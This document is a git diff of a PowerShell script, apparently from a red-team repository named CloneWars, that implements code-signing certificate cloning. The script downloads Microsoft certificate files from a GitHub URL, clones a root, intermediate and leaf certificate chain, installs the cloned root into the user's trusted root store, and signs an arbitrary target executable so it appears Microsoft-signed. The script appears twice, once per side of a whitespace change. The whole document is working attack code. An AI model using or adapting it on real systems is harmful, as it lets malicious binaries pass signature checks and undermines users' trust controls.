ahhh · March 23, 2023 20:22 · ahhh · Dec 26, 2017
diff --git a/Cert-Clone.ps1 b/Cert-Clone.ps1
 # Technique taken from: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
 # Remeber to set your target file path to $SignThis!!
 # Example: $SignThis = "C:\Users\user\Desktop\runme.exe"; Cert-Clone.ps1;

 # Setup Cert Store in Reg
 $CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
 # Setup Cert Store on Disk
 [system.io.directory]::CreateDirectory("C:\CertStore")

 # Download Root Cert
 Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ahhh/CloneWars/master/MS_root3.cer" -OutFile "C:\CertStore\msrc.cer"
 $MS_Root_Cert = Get-PfxCertificate -FilePath C:\CertStore\msrc.cer
 $Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation

 # Download PCA Cert
 Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ahhh/CloneWars/master/MS_pca3.cer" -OutFile "C:\CertStore\mspca.cer"
 $MS_PCA_Cert = Get-PfxCertificate -FilePath C:\CertStore\mspca.cer
 $Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation

 # Download Leaf Cert
 Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ahhh/CloneWars/master/MS_leaf3.cer" -OutFile "C:\CertStore\msleaf.cer"
 $MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\CertStore\msleaf.cer
 $Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation

 # Import our root Cert
 Export-Certificate -Type CERT -FilePath C:\CertStore\msrcc.cer -Cert $Cloned_MS_Root_Cert
 Import-Certificate -FilePath C:\CertStore\msrcc.cer -CertStoreLocation Cert:\CurrentUser\Root\

 # Sign target binary
 Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath $SignThis
 # Check a Signature
 #Get-AuthenticodeSignature -FilePath $SignThis
	# Technique taken from: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
	# Remeber to set your target file path to $SignThis!!
	# Example: $SignThis = "C:\Users\user\Desktop\runme.exe"; Cert-Clone.ps1;

	# Setup Cert Store in Reg
	$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }
	# Setup Cert Store on Disk
	[system.io.directory]::CreateDirectory("C:\CertStore")

	# Download Root Cert
	Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ahhh/CloneWars/master/MS_root3.cer" -OutFile "C:\CertStore\msrc.cer"
	$MS_Root_Cert = Get-PfxCertificate -FilePath C:\CertStore\msrc.cer
	$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation

	# Download PCA Cert
	Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ahhh/CloneWars/master/MS_pca3.cer" -OutFile "C:\CertStore\mspca.cer"
	$MS_PCA_Cert = Get-PfxCertificate -FilePath C:\CertStore\mspca.cer
	$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation

	# Download Leaf Cert
	Invoke-WebRequest -Uri "https://raw.githubusercontent.com/ahhh/CloneWars/master/MS_leaf3.cer" -OutFile "C:\CertStore\msleaf.cer"
	$MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\CertStore\msleaf.cer
	$Cloned_MS_Leaf_Cert = New-SelfSignedCertificate -CloneCert $MS_Leaf_Cert -Signer $Cloned_MS_PCA_Cert @CertStoreLocation

	# Import our root Cert
	Export-Certificate -Type CERT -FilePath C:\CertStore\msrcc.cer -Cert $Cloned_MS_Root_Cert
	Import-Certificate -FilePath C:\CertStore\msrcc.cer -CertStoreLocation Cert:\CurrentUser\Root\

	# Sign target binary
	Set-AuthenticodeSignature -Certificate $Cloned_MS_Leaf_Cert -FilePath $SignThis
	# Check a Signature
	#Get-AuthenticodeSignature -FilePath $SignThis